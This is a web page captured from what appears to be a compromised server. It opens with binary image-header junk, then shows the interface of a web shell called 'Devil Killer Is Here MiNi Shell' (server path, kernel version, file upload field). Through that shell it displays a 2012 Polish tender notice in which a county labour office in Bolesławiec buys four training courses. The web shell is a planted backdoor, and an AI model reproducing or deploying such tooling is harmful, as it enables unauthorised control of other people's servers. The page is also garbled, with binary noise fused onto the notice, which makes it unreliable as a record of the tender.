JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120207/36848-N-2012.html

<p class="kh_header"><b>Bolesławiec: Zakup usług szkoleniowych w czterech częściach.</b><br>
<b>Numer ogłoszenia: 36848 - 2012; data zamieszczenia: 07.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Bolesławcu , ul. Obrońców Helu 10, 59-700 Bolesławiec, woj. dolnośląskie, tel. 075 7326601, faks 075 7326601.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pup.boleslawiec.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług szkoleniowych w czterech częściach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup usług szkoleniowych w czterech częściach:
Część 1. TECHNIKI SKUTECZNEJ SPRZEDAŻY
- szkolenie dla 30 osób, w trzech terminach: 1. III-IV 2012, 2. VI-VII 2012, 3. X-XI 2012.
Część 2. GOSPODARKA MAGAZYNOWA
- szkolenie dla 15 osób w terminie IV-V 2012
Część 3. PRACOWNIK KSIĘGOWOŚĆI 
- szkolenie dla 15 osób w terminie V-VI 2012
Część 4. SPECJALISTA DS. KADROWO-PŁACOWYCH Z OBSŁUGĄ SEKRETARIATU
- szkolenie dla 10 osób w terminie VIII-X 2012.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 09.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiadają wpis do właściwego rejestru sądowego albo wpis do ewidencji działalności gospodarczej, 
- posiadają wpis instytucji szkoleniowej do rejestru instytucji szkoleniowych wydanych przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-dla zamówienia w części: 1 - przeprowadzili minimum 3 szkolenia w grupie minimum 10-osobowej w okresie ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia. Wykonawca zobowiązany jest załączyć dokumenty potwierdzające należyte wykonanie usługi. Odpowiadających swoim rodzajem oznacza doświadczenie w prowadzeniu szkoleń w zakresie obsługi komputera i kasy fiskalnej. Za usługi odpowiadające wartością usługom stanowiącym przedmiot zamówienia Zamawiający będzie rozumiał doświadczenie w realizacji usług szkoleniowych zgodnych z przedmiotem zamówienia dla grup minimum 10 osobowych;
- dla zamówienia w części: 2, 3, 4 - przeprowadzili minimum 1 szkolenie w grupie minimum 10-osobowej w okresie ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiadają narzędzia, wyposażenie lokalu, w którym będzie prowadzone szkolenie oraz urządzenia techniczne dostępne wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiadają osoby, które uczestniczyć będą w wykonywaniu zamówienia, w szczególności odpowiedzialne za świadczenie usług, z odpowiednimi kwalifikacjami zawodowymi, doświadczeniem i wykształceniem niezbędnym do wykonania zamówienia,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.boleslawiec.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Bolesławcu, 59-700 Bolesławiec, ul. Obrońców Helu 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2012 godzina 07:15, miejsce: Powiatowy Urząd Pracy w Bolesławcu, 59-700 Bolesławiec, ul. Obrońców Helu 10, pokój nr 204 (sekretariat) I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> TECHNIKI SKUTECZNEJ SPRZEDAŻY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a.	Zagadnienia 
- techniki sprzedaży i obsługi klienta
- podstawowe zagadnienia z zakresu marketingu
- rola promocji w sprzedaży
- podstawy obsługi komputera:
- bazy danych,
- podstawy technik informatycznych,
- użytkowanie komputera, 
- przetwarzanie tekstów,
- Internet,
- obsługa kas fiskalnych:
- obsługa kas fiskalnych,
- programowanie kas fiskalnych,
- obsługa programu SUBIEKT 5.
b.	Liczba uczestników szkolenia: łącznie skierowanych na szkolenie zostanie 30 osób. Wykonawca przeprowadzi 3 szkolenia w trzech różnych terminach, każde po 10 osób.
c.	Charakterystyka osób, dla których szkolenie jest przeznaczone:
- wykształcenie minimum zawodowe,
- w pierwszej kolejności będą kierowane osoby po szkoleniu w Klubie Pracy  
d.	Informacje o egzaminie oraz rodzaju dokumentu potwierdzającego ukończenie szkolenia oraz nabycie uprawnień: egzamin wewnętrzny; zaświadczenie o ukończeniu szkolenia.
e.	Liczba godzin zegarowych szkolenia: 160 godzin zegarowych łącznie z przerwami oraz egzaminami. 
f.	Miejsce szkolenia: teren miasta Bolesławiec Śląski.
g.	Informacje dodatkowe: do realizacji szkolenia Wykonawca zapewnia:
- catering (kawa, herbata, woda mineralna oraz ciasteczka, paluszki); 
- odpowiednią kadrę dydaktyczną;
- materiały dydaktyczne oraz piśmienne, które po zakończeniu szkolenia przejdą na własność uczestnika szkolenia: oryginał podręcznika, notatnik/ zeszyt, długopis, zakreślacz, jeżeli Wykonawca dodatkowo przewiduje przekazywanie uczestnikom szkolenia materiałów w formie kserokopii, należy wyposażyć uczestnika szkolenia również w segregator, a na zajęciach uczestnicy szkolenia będą mieli stały swobodny dostęp do sprawnie działającego dziurkacza oraz zszywacza;
- odpowiednie warunki lokalowe i wyposażenie techniczne, adekwatne do rodzaju szkolenia, kursanci będą pracować na w pełni wyposażonych, indywidualnych stanowiskach: podczas zajęć z obsługi komputera oraz kas fiskalnych każdy z uczestników szkolenia będzie zdobywał wiedzę na  indywidualnym stanowisku odpowiednio wyposażonym w sprawnie działający sprzęt;
- dla każdego uczestnika szkolenia ubezpieczenie od następstw nieszczęśliwych wypadków na szkoleniu oraz w drodze z miejsca zamieszkania do miejsca odbywania szkolenia i z powrotem;
- osobę, która będzie odpowiedzialna za nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 02.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. posiadanie przez Wykonawcę certyfikatu jakości usług szkoleniowych w zakresie świadczenia usług szkoleniowych zgodnych z daną częścią przedmiotu zamów - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> GOSPODARKA MAGAZYNOWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a.	Zagadnienia:
(fakturowanie, obsługa komputera, kasy fiskalne, obsługa wózków jezdniowych z UDT oraz certyfikatem w  j. angielskim)
- szkolenie bhp,
- księgowość magazynowa,
- podstawy obsługi komputera:
- bazy danych,
- podstawy technik informatycznych,
- użytkowanie komputera, 
- przetwarzanie tekstów,
- arkusze kalkulacyjne,
- Internet,
- obsługa kas fiskalnych:
- obsługa kas fiskalnych,
- programowanie kas fiskalnych,
- obsługa programu SUBIEKT 5,
- obsługa wózków jezdniowych:
- budowa wózków,
- bezpieczna obsługa - wymiana butli gazowych,
- typy stosowanych wózków jezdniowych,
- czynności operatora przy obsłudze wózków,
- wiadomości z zakresu ładunkoznawstwa,
- wiadomości UDT,
- praktyczna nauka jazdy (program szkolenia musi być zgodny z rozporządzeniem Ministra Gospodarki z 10 maja 2002 r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz. U. z 2002 r. Nr 70, poz. 650 ze zm.).
b.	Liczba uczestników szkolenia: 15 osób.
c.	Charakterystyka osób, dla których szkolenie jest przeznaczone:
- wykształcenie minimum zawodowe
- brak przeciwwskazań lekarskich
d.	Informacje o egzaminie oraz rodzaju dokumentu potwierdzającego ukończenie szkolenia oraz nabycie uprawnień: po zakończeniu szkolenia każdy z kursantów przystąpi do egzaminu przed organem Urzędu Dozoru Technicznego, a następnie po pozytywnie zdanym egzaminie otrzyma zaświadczenie lub inny dokument potwierdzający ukończenie szkolenia oraz dokument potwierdzający ww. uprawnienia wydany przez UDT wraz z certyfikatem w języku angielskim.
e.	Liczba godzin zegarowych szkolenia: 180 godzin zegarowych zajęć łącznie z przerwami oraz egzaminami.
f.	Miejsce szkolenia: teren miasta Bolesławiec Śląski.
g.	Informacje dodatkowe: do realizacji szkolenia Wykonawca zapewnia:
- catering (kawa, herbata, woda mineralna oraz ciasteczka, paluszki); 
- odpowiednią kadrę dydaktyczną;
- materiały dydaktyczne oraz piśmienne, które po zakończeniu szkolenia przejdą na własność uczestnika szkolenia, notatnik/ zeszyt, długopis, zakreślacz, jeżeli Wykonawca dodatkowo przewiduje przekazywanie uczestnikom szkolenia materiałów w formie kserokopii, należy wyposażyć uczestnika szkolenia również w segregator, a na zajęciach uczestnicy szkolenia będą mieli stały swobodny dostęp do sprawnie działającego dziurkacza oraz zszywacza;
- zapewni odpowiednie warunki lokalowe i wyposażenie techniczne, adekwatne do rodzaju szkolenia, odpowiadające indywidualnym potrzebom szkoleniowym uczestników; kursanci będą pracować na w pełni wyposażonych, indywidualnych stanowiskach: podczas zajęć z obsługi komputera oraz kas fiskalnych każdy z uczestników szkolenia będzie zdobywał wiedzę na odpowiednio wyposażonym indywidualnym stanowisku; podczas zajęć praktycznych z zakresu obsługi wózka jezdniowego do jednego wózka jezdniowego zostanie przypisanych maksymalnie dwóch kursantów;
- dla każdego uczestnika szkolenia ubezpieczenie od następstw nieszczęśliwych wypadków na szkoleniu oraz w drodze z miejsca zamieszkania do miejsca odbywania szkolenia i z powrotem;
- osobę, która będzie odpowiedzialna za nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 02.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświadczenie Wykonawcy w realizacji szkoleń zgodnych z przedmiotem zamówienia w okresie ostatnich trzech lat - 30</li>
<li>3. posiadanie przez Wykonawcę certyfikatu jakości usług szkoleniowych w zakresie świadczenia usług szkoleniowych zgodnych z daną częścią przedmiotu zamów - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PRACOWNIK KSIĘGOWOŚCI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a.	Zagadnienia:
- rachunkowość - pojęcie, zakres, zasady;
- środki gospodarcze oraz źródła ich finansowania; 
- ewidencja operacji gospodarczych;  
- zasady prowadzenia ksiąg rachunkowych;  
- aktywa pieniężne i ich ewidencja;
- podatek od towarów i usług;
- rzeczowe aktywa obrotowe - zapasy; 
- wycena i ewidencja rzeczowych aktywów trwałych;  
- wartości niematerialne i prawne;
- rozrachunki w księgach rachunkowych;  
- ewidencja i rozliczanie kosztów podstawowej działalności operacyjnej;  
- przychody podstawowej działalności operacyjnej;
- procedury związane z ustalaniem wyniku finansowego; 
- podatek dochodowy od osób prawnych;
- sprawozdanie  finansowe; 
- przykład całościowy: od bilansu do bilansu;
- sporządzenie rachunku zysków i strat oraz bilansu.
b.	Liczba uczestników szkolenia: 15 osób.
c.	Charakterystyka osób, dla których szkolenie jest przeznaczone:
- wykształcenie minimum średnie,
- swobodna obsługa komputera.
d.	Informacje o egzaminie oraz rodzaju dokumentu potwierdzającego ukończenie szkolenia oraz nabycie uprawnień: egzamin wewnętrzny; zaświadczenie o ukończeniu szkolenia.
e.	Liczba godzin zegarowych szkolenia: 200 godzin zegarowych zajęć łącznie z przerwami oraz egzaminami.
f.	Miejsce szkolenia: teren miasta Bolesławiec Śląski.
g.	Informacje dodatkowe: do realizacji szkolenia Wykonawca zapewnia:
- catering (kawa, herbata, woda mineralna oraz ciasteczka, paluszki); 
- odpowiednią kadrę dydaktyczną;
- dla każdego uczestnika szkolenia materiały dydaktyczne oraz piśmienne, które po zakończeniu szkolenia przejdą na jego własność: oryginał podręcznika, notatnik/ zeszyt, długopis, zakreślacz, jeżeli Wykonawca dodatkowo przewiduje przekazywanie uczestnikom szkolenia materiałów w formie kserokopii, należy wyposażyć uczestnika szkolenia również w segregator, a na zajęciach uczestnicy szkolenia będą mieli stały swobodny dostęp do sprawnie działającego dziurkacza oraz zszywacza;
- odpowiednie warunki lokalowe i wyposażenie techniczne, adekwatne do rodzaju szkolenia, odpowiadające indywidualnym potrzebom szkoleniowym uczestników; dla każdego uczestnika szkolenia Wykonawca zapewni dostęp do sprawnie działającego sprzętu komputerowego; 
- dla każdego uczestnika szkolenia ubezpieczenie od następstw nieszczęśliwych wypadków na szkoleniu oraz w drodze z miejsca zamieszkania do miejsca odbywania szkolenia i z powrotem;
- osobę, która będzie odpowiedzialna za nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 02.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. posiadanie przez Wykonawcę certyfikatu jakości usług szkoleniowych w zakresie świadczenia usług szkoleniowych zgodnych z daną częścią przedmiotu zamów - 30</li>
<li>3. posiadanie przez Wykonawcę certyfikatu jakości usług szkoleniowych w zakresie świadczenia usług szkoleniowych zgodnych z daną częścią przedmiotu zamów - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> SPECJALISTA DS. KADROWO-PŁACOWYCH Z OBSŁUGĄ SEKRETARIATU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a.	Zagadnienia 
 - organizacja i zarządzanie biurem,
- obsługa klienta,
- zastosowanie komputera i innych urządzeń biurowych w pracy,
- organizacja spotkań, zebrań, konferencji,
- zakładanie i prowadzenie akt osobowych,
- archiwizacja dokumentów,
- naliczanie płac i ZUS,
- elementy prawa pracy,
- czas pracy,
- umowy o pracę,
- stosunek pracy.
b.	Liczba uczestników szkolenia: 10 osób.
c.	Charakterystyka osób, dla których szkolenie jest przeznaczone:
 - wykształcenie minimum średnie,
-  podstawy obsługi komputera,
- dokładność, rzetelność i sumienność, systematyczność,
- zdolność podejmowania szybkich i trafnych decyzji,
- zdolności organizacyjne,
- kreatywność, podzielność uwagi, odporność emocjonalna,
- łatwość wypowiadania się w mowie i piśmie.
d.	Informacje o egzaminie oraz rodzaju dokumentu potwierdzającego ukończenie szkolenia oraz nabycie uprawnień: egzamin wewnętrzny; zaświadczenie o ukończeniu szkolenia.
e.	Liczba godzin zegarowych szkolenia: 380 godzin zegarowych zajęć łącznie z przerwami oraz egzaminami, w tym 180 godzin obsługa sekretariatu, 200 godzin specjalista ds. kadrowo-płacowych. 
f.	Miejsce szkolenia: teren miasta Bolesławiec Śląski.
g.	Informacje dodatkowe: do realizacji szkolenia Wykonawca zapewnia:
- catering (kawa, herbata, woda mineralna oraz ciasteczka, paluszki) 
- odpowiednią kadrę dydaktyczną;
- materiały dydaktyczne oraz piśmienne, które po zakończeniu szkolenia przejdą na własność uczestnika szkolenia: oryginał podręcznika, notatnik/ zeszyt, długopis, zakreślacz, jeżeli Wykonawca dodatkowo przewiduje przekazywanie uczestnikom szkolenia materiałów w formie kserokopii, należy wyposażyć uczestnika szkolenia również w segregator, a na zajęciach uczestnicy szkolenia będą mieli stały swobodny dostęp do sprawnie działającego dziurkacza oraz zszywacza;
